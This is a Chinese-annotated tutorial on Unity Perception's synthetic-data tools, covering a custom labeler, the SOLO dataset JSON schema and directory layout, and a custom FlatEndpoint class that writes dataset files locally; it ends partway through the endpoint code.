    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    using System;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Rendering;

    public class CustomLabeler : CameraLabeler // 定义了 CustomLabeler 类,继承自 CameraLabeler
    {
    // 重写了 description、labelerId 和 supportsVisualization 属性
    public override string description => "Demo labeler";
    public override string labelerId => "Demo labeler";
    protected override bool supportsVisualization => false;

    // 创建了一个公共的 GameObject 类型的变量 targetLight 和 target,分别表示需要标记的灯光和物体的信息
    public GameObject targetLight;
    public GameObject target;

    // 定义了一个 MetricDefinition 类型的变量 lightMetricDefinition 和一个 AnnotationDefinition 类型的变量 targetPositionDef,分别表示灯光的度量标准和物体位置的注释定义
    MetricDefinition lightMetricDefinition;
    AnnotationDefinition targetPositionDef;

    // 新定义了一个 AnnotationDefinition 子类 TargetPositionDef,用于表示物体在相机空间中的位置
    class TargetPositionDef : AnnotationDefinition
    {
    // 构造函数:接受一个字符串类型的 ID 作为参数,用于初始化注释定义实例
    public TargetPositionDef(string id)
    : base(id) { }

    // 成员变量 modelType:表示注释定义所属的模型类型,是一个只读字符串属性,该属性指定了该注释定义的类型
    public override string modelType => "targetPosDef";
    // 成员变量 description:表示注释定义的描述信息,是一个只读字符串属性,该属性描述了注释定义的用途和含义
    public override string description => "The position of the target in the camera's local space";
    }

    // 定义了一个序列化的 TargetPosition 类,其中包括物体的注释信息以及其在相机空间中的位置
    [Serializable]
    class TargetPosition : Annotation
    {
    // 构造函数:
    // 接受注释定义(AnnotationDefinition)实例
    // 感知传感器 ID(sensorId)
    // 物体在相机空间中的位置信息(pos)
    // 调用基类的构造函数进行初始化
    public TargetPosition(AnnotationDefinition definition, string sensorId, Vector3 pos)
    : base(definition, sensorId)
    {
    position = pos;
    }

    // 成员变量 position:表示物体在相机空间中的位置,类型为 Vector3
    public Vector3 position;

    // 方法 ToMessage():将该注释实例转换为消息格式,方便传输和分析。
    public override void ToMessage(IMessageBuilder builder)
    {
    base.ToMessage(builder);
    // 使用 IMessageBuilder 接口的 AddFloatArray() 方法将 position 转换为浮点数数组,并添加到消息体中去
    builder.AddFloatArray("position", MessageBuilderUtils.ToFloatVector(position));
    }

    // 检查该注释实例是否合法,始终返回 true
    public override bool IsValid() => true;

    }

    // 在 Setup() 方法中,注册度量标准 lightMetricDefinition 和注释定义 targetPositionDef
    protected override void Setup()
    {
    // 创建了一个名为 lightMetricDefinition 的 MetricDefinition 类实例,该实例表示灯光在世界空间中的位置度量。
    // 使用 MetricDefinition 构造函数传入三个字符串类型的参数:ID、名称和描述,
    // 分别指定度量定义的唯一标识符、度量定义的名称和作用。
    lightMetricDefinition =
    new MetricDefinition(
    "LightMetric",
    "lightMetric1",
    "The world-space position of the light");
    // 通过 DatasetCapture 类的 RegisterMetric() 方法注册了上述定义的度量定义,将其添加到场景捕捉器中。
    DatasetCapture.RegisterMetric(lightMetricDefinition);

    // 创建了一个名为 targetPositionDef 的 TargetPositionDef 类实例,
    // 该实例表示场景中某个目标物体相对于相机的位置注释。
    // 使用 TargetPositionDef 构造函数传入一个字符串 ID 参数,用于初始化注释定义实例。
    targetPositionDef = new TargetPositionDef("target1");
    // 通过 DatasetCapture 类的 RegisterAnnotationDefinition() 方法注册了上述定义的注释定义,
    // 将其添加到场景捕捉器中。
    DatasetCapture.RegisterAnnotationDefinition(targetPositionDef);
    }

    // 在 OnBeginRendering() 方法中,获取灯光位置并报告度量;计算物体在相机空间中的位置并报告注释
    // 这段代码出现在某个类的 OnBeginRendering() 方法中,在场景渲染之前被调用。
    protected override void OnBeginRendering(ScriptableRenderContext scriptableRenderContext)
    {
    // 获取灯光的世界空间位置,并使用 GenericMetric 类创建一个度量对象,
    // 并将其位置信息添加到 JSON 数组字符串中,将度量对象报告给 DatasetCapture,以记录灯光的位置信息。
    // Report the light's position by manually creating the json array string.
    var lightPos = targetLight.transform.position;
    var metric = new GenericMetric(new[] { lightPos.x, lightPos.y, lightPos.z }, lightMetricDefinition);
    DatasetCapture.ReportMetric(lightMetricDefinition, metric);

    // 计算目标物体相对于相机的本地位置,并使用 TargetPosition 类创建一个注释对象,
    // 其中包括注释的类型(即 targetPositionDef)、传感器 ID 和目标物体的本地位置信息。
    // compute the location of the object in the camera's local space
    Vector3 targetPos = perceptionCamera.transform.worldToLocalMatrix * target.transform.position;

    // 使用 PerceptionCamera 的 SensorHandle 类报告上述注释对象,并将其添加到 DatasetCapture 中。
    // Report using the PerceptionCamera's SensorHandle if scheduled this frame
    var sensorHandle = perceptionCamera.SensorHandle;

    if (sensorHandle.ShouldCaptureThisFrame)
    {
    var annotation = new TargetPosition(targetPositionDef, sensorHandle.Id, targetPos);
    sensorHandle.ReportAnnotation(targetPositionDef, annotation);
    }
    }
    }

    Example metric that is added each frame in the dataset:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    {
    "capture_id": null,
    "annotation_id": null,
    "sequence_id": "9768671e-acea-4c9e-a670-0f2dba5afe12",
    "step": 1,
    "metric_definition": "lightMetric1",
    "values": [
    96.1856,
    192.675964,
    -193.838638
    ]
    },

    **Example annotation that is added to each capture in the dataset: **

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    {
    "annotation_id": "target1",
    "model_type": "targetPosDef",
    "description": "The position of the target in the camera's local space",
    "sensor_id": "camera",
    "id": "target1",
    "position": [
    1.85350215,
    -0.253945172,
    -5.015307
    ]
    }

    Output Endpoint

    Dataset Capture 跟踪 sensors(传感器)annotations(注释)metrics(度量),将数据传递到 EndpointEndpoint 负责将数据打包为用户可用的格式。

    Supported Endpoints

    Perception 软件包包含三个内置端点选项:

    1. (推荐)SOLO Endpoint

    随着模拟的进行,我们最新的输出格式将捕获信息写入相关目录。这与我们以前在模拟结束时写入数据的方法不同,使您能够在长时间模拟运行时查看数据。查看 SOLO endpoint 相对于我们以前的 Perception endpoint 所具有的优势的完整列表。


    SOLO 数据集是 JSON 和图像文件的组合。本文档描述了用于存储数据的架构。

    SOLO schema(模式)为模拟输出提供了一种通用结构,可以很容易地使用它来显示统计数据或训练机器学习模型。

    SOLO 数据集由 sensor captures(传感器捕获)、annotations(注释)和 metrics(度量组成),例如 images(图像)和 2d bounding box labels(二维边界框标签)。

    这些数据有各种形式,可能会被不同的 sensors(传感器)和 annotation(注释机制)捕获。

    多个 sensors(传感器)可以产生不同频率的捕获。

    目标

    schema(模式)应该:

    • 以一种定义良好的格式包括捕获的传感器数据和注释。这使我们能够维护 Perception 包和数据集消费者之间的合同(例如,统计和 ML 建模…)

    • 维护捕获的数据和同一传感器同时获取的注释之间的关系。

      它还应保持与时间相关的感知任务(如物体跟踪)的连续捕获之间的关系。

    • 支持流式数据,因为数据将在模拟过程中从多个进程或云实例动态创建。

    • 能够轻松支持新型传感器和注释。

    术语
    • simulation:一个 Unity player 构建的一个或多个 build,可能具有不同的参数。
    • capture:Unity 传感器的完整渲染过程,将渲染结果保存到数据文件中,如(png、pcd 等)
    • frame:Unity 模拟中的实际帧
    • sequence:simulation 生成的按时间顺序的一系列 captures。(Perception Scenario 中每一个 Iteration 对应一个 SOLO 数据 sequence)
    • step:每个 sequence 产生 frames 的数据索引。
    • annotation:记录的数据(如边界框或语义分割),用于描述同一时间戳的特定 capture。capture 可能包括多种类型的 annotations。
    • label:表示语义类型或类的字符串标记(如 car、human.adult 等)。一个 GameObject 可能有多个 labels 用于不同的 annotation 目的。
    • coordinate systems:schema 中使用了 3 个坐标系:
      • global coordinate system:相对于 Unity 中 global origin 的坐标。
      • sensor coordinate system:相对于 sensor(传感器)的坐标。这对于单个传感器的 ML 模型训练很有用,该传感器可以从全局坐标系和自我坐标系转换。在仿真中很少记录使用传感器坐标系的物体姿态的原始值。
    结构

    png

    SOLO 数据存储在 sequence/step 层次结构中。生成的数据的顶层将包括元数据定义文件,以及每个 captured sequence 的目录。

    在 sequence 目录中,将有一个 JSON 文件,其中包含 frame 中的所有 annotations 和 metrics。

    sensors 和 annotators(如 RGB 捕获或分段掩码)也将驻留在该目录中。出于组织目的,所有文件都将遵循严格的命名模式,frame 文件如下:

    • step.NNNN.frame.json
      • NNNN 是 step 的序号
    • step.NNNN.ID.EXT
      • NNNN 是 step 的序号
      • ID 是创建文件的 sensor 或 labeler 的注册 ID
      • EXT 是文件扩展名

    顶级目录包含:

    • metadata.json:元数据文件包含模拟范围的数据。这些值要么由 Perception 软件包自动生成一次,要么是系统范围的元数据。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    {
    "unityVersion": "2021.3.11f1",
    "perceptionVersion": "1.0.0-preview.1",
    "renderPipeline": "HDRP",
    "simulationStartTime": "2023/6/21 8:17:17",
    "scenarioRandomSeed": 539662031,
    "scenarioActiveRandomizers": [
    "BackgroundObjectPlacementRandomizer",
    "TextureRandomizer",
    "HueOffsetRandomizer",
    "ForegroundObjectPlacementRandomizer",
    "RotationRandomizer"
    ],
    "totalFrames": 100,
    "totalSequences": 100,
    "sensors": [
    "camera"
    ],
    "metricCollectors": [
    "ObjectCount",
    "RenderedObjectInfo",
    "scenario_iteration",
    "random-seed"
    ],
    "simulationEndTime": "2023/6/21 8:17:21",
    "annotators": [
    {
    "name": "bounding box",
    "type": "type.unity.com/unity.solo.BoundingBox2DAnnotation"
    },
    {
    "name": "semantic segmentation",
    "type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation"
    }
    ]
    }
    • sensor_definitions.json:包含数据集中所有 sensors 的定义。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    {
    "sensorDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.RGBCamera",
    "id": "camera",
    "modality": "camera",
    "description": "",
    "firstCaptureFrame": 0.0,
    "captureTriggerMode": "Scheduled",
    "simulationDeltaTime": 0.0166,
    "framesBetweenCaptures": 0,
    "manualSensorsAffectTiming": false
    }
    ]
    }
    • annotation_definitions.json:包含数据集中所有注释的定义。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    {
    "annotationDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.BoundingBox2DAnnotation",
    "id": "bounding box",
    "description": "Produces 2D bounding box annotations for all visible objects that bear a label defined in this labeler's associated label configuration.",
    "spec": [
    {
    "label_id": 1,
    "label_name": "candy_minipralines_lindt"
    },

    ...

    {
    "label_id": 10,
    "label_name": "snack_granolabar_naturevalley"
    }
    ]
    },
    {
    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "semantic segmentation",
    "description": "Generates a semantic segmentation image for each captured frame. Each object is rendered to the semantic segmentation image using the color associated with it based on this labeler's associated semantic segmentation label configuration. Semantic segmentation images are saved to the dataset in PNG format. Please note that only one SemanticSegmentationLabeler can render at once across all cameras."
    }
    ]
    }
    • metric_definitions.json:包含数据集中所有 metrics 的定义。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    {
    "metricDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.ObjectCountMetric",
    "id": "ObjectCount",
    // 为该标签器相关的标签配置中定义的每个标签生成对象计数。
    "description": "Produces object counts for each label defined in this labeler's associated label configuration."
    },
    {
    "@type": "type.unity.com/unity.solo.RenderedObjectInfoMetric",
    "id": "RenderedObjectInfo",
    // 根据该标签器相关的标签配置,为每个在摄像头画面中占用一个或多个像素的对象,在每帧中生成标签 ID、实例 ID 和可见像素计数的单个度量。
    "description": "Produces label id, instance id, and visible pixel count in a single metric each frame for each object which takes up one or more pixels in the camera's frame, based on this labeler's associated label configuration."
    },
    {
    "@type": "type.unity.com/unity.solo.GenericMetric",
    "id": "scenario_iteration",
    // 数据集序列的迭代信息。
    "description": "Iteration information for dataset sequences"
    },
    {
    "@type": "type.unity.com/unity.solo.GenericMetric",
    "id": "random-seed",
    // 随机种子用于初始化仿真的随机状态。每次仿真只会触发一次。
    "description": "The random seed used to initialize the random state of the simulation. Only triggered once per simulation."
    }
    ]
    }

    每个 sequence 都将获得自己的目录,该目录将包含所有 capture。序列目录的命名约定如下:sequence.X,其中 X 是从值 0 开始的数值。例如,模拟的前三个 sequence 目录名称为:

    • sequence.0
    • sequency.1
    • sequence.2

    sequence 目录包含序列的所有 captures、annotations 和 metrics。

    所有数据文件名都以捕获它们的步骤开始。根据文件类型的不同,文件名规则不同:

    File Structure
    1
    2
    3
    4
    5
    6
    7
    8
    9
    dataset.XXXX
    ├── metadata.json
    ├── sensor_definitions.json
    ├── annotation_definitions.json
    ├── metric_definitions.json
    └── sequence.NUM
    ├── step.NUM.frame.json
    ├── step.NUM.capture.SENSOR[_ID].[ext]
    └── step.NUM.annotation.NAME[_ID].SENSOR[_ID].[ext]
    Example Dataset Layout
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    dataset
    ├── metadata.json
    ├── sensor_definitions.json
    ├── annotation_definitions.json
    ├── metric_definitions.json
    ├── sequence.1
    │ ├── step.1.frame.json
    │ ├── step.1.rgb.front_camera.png
    │ ├── step.1.semantic_segmentation_0.png
    │ ├── step.1.semantic_segmentation_1.png
    │ ├── step.1.instance_segmentation.png
    │ ├── step.2.frame.json
    │ ├── step.2.rgb.front_camera.png
    │ ├── step.2.semantic_segmentation_0.png
    │ ├── step.2.semantic_segmentation_1.png
    │ └── step.2.instance_segmentation.png
    └── sequence.2
    ├── step.1.frame.json
    ├── step.1.rgb.front_camera.png
    ├── step.1.semantic_segmentation_0.png
    ├── step.1.semantic_segmentation_1.png
    ├── step.1.instance_segmentation.png
    ├── step.2.frame.json
    ├── step.2.rgb.front_camera.png
    ├── step.2.semantic_segmentation_0.png
    ├── step.2.semantic_segmentation_1.png
    └── step.2.instance_segmentation.png
    Frame

    对于 step.1.frame.json,文件结构及解释:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    frame {
    frame: <int> -- The integer ID of the frame
    sequence: <int> -- The sequence number
    step: <int> -- The step inside the sequence
    timestamp: <int> -- Timestamp in milliseconds since the sequence started 自序列开始以来的时间戳(以毫秒为单位)
    captures: [<capture>,...] [optional] - The list of captures (see below) captures 的参数信息
    metrics: [<metric>,...] [optional] - The list of metrics recorded for the frame (see below) metric 的参数信息
    }
    Capture

    png

    Capture 记录包含 captured(捕获)的文件、annotations(注释)集合和描述 sensor 状态的额外 metadata(元数据)之间的关系。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    capture {
    @type: <str> -- The class type of the sensor
    id: <str> -- The ID of the sensor that made the capture
    description: <str> -- Human readable description of the sensor
    position: <float3> -- Position in meters: (x, y, z) with respect to the global coordinate system
    rotation: <float4> -- Orientation as quaternion: w, x, y, z
    velocity: <float3> -- Velocity in meters per second as v_x, v_y, v_z
    acceleration: <float3> [optional] -- Acceleration in meters per second^2 as a_x, a_y, a_z
    annotations: [<obj>,...] [optional] -- List of the annotations in this capture. See below.
    }
    RGB Capture

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    rgb_capture : capture {
    filename: <str> -- A single file that stores sensor captured data.
    imageFormat: <str> -- The format of the sensor captured file. (e.g. "Png")
    dimension: <int2> -- The image size in pixels (width/height)
    projection: <string> -- holds the type of projection the camera used for that capture: Options: "perspective" or "orthographic"
    matrix: <float3> -- The projection matrix of the camera
    }

    reference: [camera_intrinsic](https://www.mathworks.com/help/vision/ug/camera-calibration.html#bu0ni74)
    Sequence, Step, and Timestamp

    在某些用例中,在模拟过程中,两个连续的捕获可能在时间上不相关。例如,如果我们在场景中为 X 步模拟生成随机放置的对象。在这种情况下,序列、步骤和时间戳与捕获的数据无关。我们可以为这些类型的捕获的序列、步骤和时间戳添加一个默认值。在我们需要保持捕获(例如,10 秒视频中的相机捕获序列)和[度量](#metrics)之间的时间顺序关系的情况下,我们需要添加序列、步骤和时间戳来保持捕获的时间顺序的关系。

    在 SOLO 中,序列表示任何时间顺序捕获和注释的集合,并对应于感知场景的一次迭代。时间戳是指自序列开始以来以毫秒为单位的模拟挂钟。步长是指在触发捕获或度量事件时增加的整数值。我们不能使用时间戳在两个不同的事件之间进行同步,因为时间戳是浮动的,因此会产生较差的索引。相反,我们使用了一个“步长”计数器,可以很容易地将同时发生的度量和捕获关联起来。

    以下是如何同步捕获、度量、时间戳和步骤的说明。

    png

    由于每个传感器可能会触发不同频率的捕获,因此在同一时间戳,我们可能包含 0 到 N 个捕获,其中 N 是该场景中包括的传感器的总数。如果在同一时间戳捕获两个传感器,则它们应该共享相同的序列、步骤和时间戳值。

    Annotation

    png

    Annotation 注释记录包含 sensor 的 ground truth,可以是内联的,也可以是单独的文件。单个 capture 可以包含许多 annotations,每个 annotation 对应于模拟中的一个活动 Labeler。

    1
    2
    3
    4
    5
    6
    annotation {
    @type: <str> -- The class type of the annotation
    id: <str> -- The registered ID of the annotation
    sensorId: <str> -- The ID of the sensor that this annotation is attached to
    description: <str> -- The human readable description of the sensor
    }

    除上述内容外,注释还可以包括为该注释记录的单个对象的阵列,例如边界框的列表。我们看下面的几个例子。此数组通常命名为 valuesinstances

    Example Annotations
    Semantic Segmentation

    语义分割注释扩展了基本注释类,以包括 PNG 格式的颜色掩码的文件名,其中每个颜色映射到唯一的对象类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    SemanticSegmentationAnnotation {
    @type: "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    id: <str> -- The registered ID of the annotation 注释的注册 ID
    sensorId: <str> -- The ID of the sensor that this annotation is attached to 此注释所附加的传感器的 ID
    description: <str> -- The human readable description of the sensor 传感器的人类可读描述
    imageFormat: <str> -- Format of the segmentation mask ("Png") 分段掩码的格式(“Png”)
    dimension: <int2> -- Width and height of the output image 输出图像的宽度和高度
    instances [ -- Array of recorded object classes and their unique R,G,B pixel values 记录的对象类及其唯一的 R、G、B 像素值的数组
    {
    labelName: <str> -- String identifier of the object class label 对象类标签的字符串标识符
    pixelValue: <int4> -- R,G,B,A values for this label's unique color [0-255] 此标签的唯一颜色的 G、B、A 值[0-255]
    }, ...
    ]
    }

    语义分段注释示例:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    {
    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "9ca0e2e4-5a0f-4ee3-8cae-b34565275059",
    "sensorId": "camera",
    "description": "Produces a semantic segmentation RGB mask",
    "imageFormat": "Png",
    "dimension": [
    1600.0,
    1200.0
    ],
    "filename": "step1.camera.9ca0e2e4-5a0f-4ee3-8cae-b34565275059.png",
    "instances": [
    {
    "labelName": "Baseboard-1",
    "pixelValue": [
    177,
    255,
    101,
    255
    ]
    }, ...
    ]
    }

    下面显示了一个示例语义分割掩码。请注意同一类物品(例如餐椅)的颜色是如何相同的:

    png

    注意:未标记的对象在分割遮罩中渲染为黑色

    Instance Segmentation

    与语义分割类似,实例分割注释包括 PNG 格式的颜色掩码的文件名。这一次,每个独特的物体都有一种独特的颜色。该模式与语义分割略有不同,包括instanceId(整个模拟中唯一的对象 id)和 labelId(对象类的数字标识符)。例如:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    "instances": [
    {
    "instanceId": 19,
    "labelId": 273,
    "labelName": "Wall",
    "color": [
    255,
    53,
    0,
    255
    ]
    }, ...
    ]

    示例实例分段掩码如下所示。请注意每个对象如何具有唯一的颜色:

    png

    2D Bounding Box

    每个边界框记录将一个元组(实例、标签)映射到一组 4 个变量(x、y、宽度、高度),用于绘制边界框。

    3D Bounding Box

    三维边界框信息。与 2D 边界框不同,3D 边界框坐标是在传感器坐标系中捕获的。每个边界框记录将一个元组(实例、标签)映射到绘制三维边界框的平移、大小和旋转,以及三维边界盒的速度和加速度(可选)。

    Keypoints

    关键点数据,通常用于人体姿态估计。

    Metrics

    度量存储可用于描述特定序列、捕获或注释的额外元数据。度量记录存储为任意数量(M)的键值对。对于序列度量,capture_id、annotation_id 和 step 应为 null。对于捕获度量,annotation_id 可以为 null。对于注释度量,sequence_id、capture_id、annotation_id 和 step 这四列都不为空。度量文件可以从不同的模拟实例并行生成。

    Definitions

    传感器、注释和度量定义表在模拟过程中是静态的。这通常来自模拟的定义,并在模拟过程中生成。

    sensor_definitions.json

    JSON 文件,包含模拟中存在的所有传感器的集合。每个传感器都被分配了一个唯一的 UUID。每个都与一个自我相关联,并将自我的 UUID 存储为外键。

    传感器扩展了这个基本传感器类,并且可以在其定义中包含其他字段。

    annotation_definitions.json

    一个 JSON 文件,包含一组注释规范(annotation_definition)。每个记录描述一种特定类型的注释。

    metric_definitions.json

    存储度量规范记录集合(metric_definition)的 JSON 文件。每个规范记录描述存储在 metric 值中的特定度量。

    Schema Versioning

    架构版本控制。

    2. Perception Endpoint

    我们的传统 Perception 输出格式,其中信息存储在捕获中,并在模拟结束时写入(或 150 帧块)。尽管该端点仍然支持所有新的 Labeler,如深度和遮挡,但我们强烈建议尝试上面的 SOLO 端点,以获得更轻松的后处理和调试体验。

    3. No Output Endpoint

    选中时,此端点不会将任何信息写入磁盘!这对于防止在编辑器中调试模拟逻辑或使用 Perception Camera 的实时可视化工具进行测试时生成无关数据集非常有用。

    How to Change the Active Endpoint

    1. Project SettingsPerception
    2. 点击 Change Endpoint Type
    3. 从下拉列表中选择您的首选端点。

    Creating your Own Endpoint

    使用 Endpoint 系统,为您喜欢的输出格式创建自己的 Endpoint 不仅是可能的,而且很容易访问。我们整理了一个假设自定义 Endpoint 的小示例,向您介绍创建、迭代和使用自己的自定义端点的基本知识。

    0.11.0-preview.1 版本以后的 Perception 软件包支持自定义端点的概念。以前,Perception 生成的所有数据都是使用我们专有的输出格式自动写入磁盘的。但是,使用自定义 Endpoint,您可以使用我们的中间表示以您选择的输出格式编写所有数据!

    我们用一个我们称之为“FlatEndpoint”的假设端点来证明这一点,该端点将在每次模拟运行中将所有数据写入一个唯一的文件夹中。为此,我们创建了一个新类并实现了“IConsumerEndpoint”。这允许在 Perception Settings UI 中选择我们的自定义端点,并将其用作模拟的端点。我们进一步实现了“IFileSystemEndpoint”界面,以连接 Perception 如何保存上次创建的数据集所在的位置,并使“显示最新数据集”按钮等功能正常工作。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    using System;
    using System.Collections.Generic;
    using System.IO;
    using Newtonsoft.Json.Linq;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.Consumers;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Perception.Settings;

    namespace MyCustomNamespace
    {
    /// <summary>
    /// Example endpoint which outputs all information in small files to one single directory.
    /// 示例端点,将所有信息输出到一个单独的目录中的小文件中。
    /// We demonstrate two methods of serializing data: (1) Custom serialization; (2) IMessageProducers
    /// 我们展示了两种序列化数据的方法:(1)自定义序列化;(2)IMessageProducers。
    /// </summary>
    /// <remarks>For more complex examples, checkout SoloEndpoint</remarks>
    /// 要了解更复杂的示例,请查看 SoloEndpoint。
    [Serializable]
    public class FlatEndpoint : IConsumerEndpoint, IFileSystemEndpoint
    {
    public string prefix = "FLAT";

    DateTimeOffset m_SimulationStartTime;

    /// Helper function to create a new JsonMessageBuilder
    /// 创建新的 JsonMessageBuilder 的辅助函数。
    JsonMessageBuilder GetNewJsonMessageBuilder() => new JsonMessageBuilder();

    #region IFileSystemEndpoint

    /// <summary>
    /// Allows the user to set the base path from the Perception Settings UI.
    /// 允许用户从 Perception Settings 用户界面设置基本路径。
    /// </summary>
    public string basePath
    {
    get => PerceptionSettings.GetOutputBasePath();
    set => PerceptionSettings.SetOutputBasePath(value);
    }

    string m_CachedCurrentPath = string.Empty;
    /// <summary>
    /// The root directory to use for all files that we output.
    /// 我们输出的所有文件使用的根目录。
    /// </summary>
    public string currentPath
    {
    get
    {
    // Check if we already reserved the output path for this simulation run
    // 检查我们是否已为此仿真运行保留了输出路径。
    if (!string.IsNullOrWhiteSpace(m_CachedCurrentPath))
    return m_CachedCurrentPath;

    // A small piece of logic to get the next available directory name
    // 获取下一个可用目录名称的小段逻辑。
    // get: {basePath}/FLAT_0
    // if above already exists, then get: {basePath}/FLAT_1
    // ... and so on

    var availableSuffix = 0;
    m_CachedCurrentPath = string.Empty;
    do
    {
    m_CachedCurrentPath = Path.Combine(basePath, $"{prefix}_{availableSuffix}");
    availableSuffix++;
    }
    while (Directory.Exists(m_CachedCurrentPath));

    // actually create the directory we decided upon above
    // 实际创建我们上面决定的目录。
    Directory.CreateDirectory(m_CachedCurrentPath);

    return m_CachedCurrentPath;
    }
    }

    /// <summary>
    /// The path used when "Reset to Default" is used in the Perception Settings UI.
    /// 在 Perception Settings 用户界面上使用“重置为默认值”时使用的路径。
    /// </summary>
    public string defaultPath => Path.Combine(Application.persistentDataPath);
    #endregion

    #region IConsumerEndpoint

    public string description => "Example endpoint that puts all the files in one single directory";

    /// <summary>
    /// Validate the configuration of your endpoint before the simulation runs.
    /// 在仿真运行之前验证端点的配置。
    /// </summary>
    public bool IsValid(out string errorMessage)
    {
    // Check if the prefix supplied by the user is empty or whitespace
    // 检查用户提供的前缀是否为空或空格。
    if (string.IsNullOrWhiteSpace(prefix))
    {
    errorMessage = "Prefix must not be empty.";
    return false;
    }

    errorMessage = $"Directory {basePath} does not exist. Please create the directory.";
    // To create {basePath}/FLAT_{xyz}, we need to ensure that the {basePath} directory exists.
    // 要创建 {basePath}/FLAT_{xyz},我们需要确保目录 {basePath} 已经存在。
    // If it doesn't, the Perception Settings UI will show the above error message.
    // 如果不存在,则 Perception Settings 用户界面将显示上述错误消息。
    return Directory.Exists(basePath);
    }

    public void SimulationStarted(SimulationMetadata metadata)
    {
    // record when the simulation started so we can use this to calculate
    // duration of the simulation on the SimulationEnded function
    // 记录仿真开始时间,以便我们可以在 SimulationEnded 函数中使用它来计算仿真持续时间。
    m_SimulationStartTime = DateTimeOffset.Now;
    }

    public void SensorRegistered(SensorDefinition sensor)
    {
    //// Using Method 1 (Custom Serialization)
    //// 使用方法 1(自定义序列化)
    // 1. Create a new JsonMessageBuilder class
    // 创建一个新的 JsonMessageBuilder 类
    var builder = GetNewJsonMessageBuilder();

    // 2. Add all relevant fields to the builder as unique key-value pairs
    // 将所有相关字段作为唯一的键值对添加到构建器中。
    builder.AddString("model_type", sensor.modelType);
    builder.AddString("capture_mode", sensor.captureTriggerMode.ToString());
    builder.AddString("id", sensor.id);
    builder.AddInt("frames_between_captures", sensor.framesBetweenCaptures);
    builder.AddFloat("first_capture_frame", sensor.firstCaptureFrame);

    // Invariant: The builder now contains a representation of the sensor class
    // 不变量:该构建器现在包含传感器类的表示。
    // 3. We can use the ToJson function in the builder to write that representation to JSON
    // 我们可以使用构建器中的 ToJson 函数将该表示写入 JSON。
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"sensor-{sensor.id}.json"),
    builder.ToJson()
    );
    }

    public void AnnotationRegistered(AnnotationDefinition annotationDefinition)
    {
    //// Using Method 2 (IMessageProducer Serialization)
    //// 使用方法 2(IMessageProducer 序列化)

    // 1. Create a new JsonMessageBuilder class
    // 创建一个新的 JsonMessageBuilder 类
    var builder = GetNewJsonMessageBuilder();

    // 2. Allow the annotation definition to convert itself to a message and add it to our builder
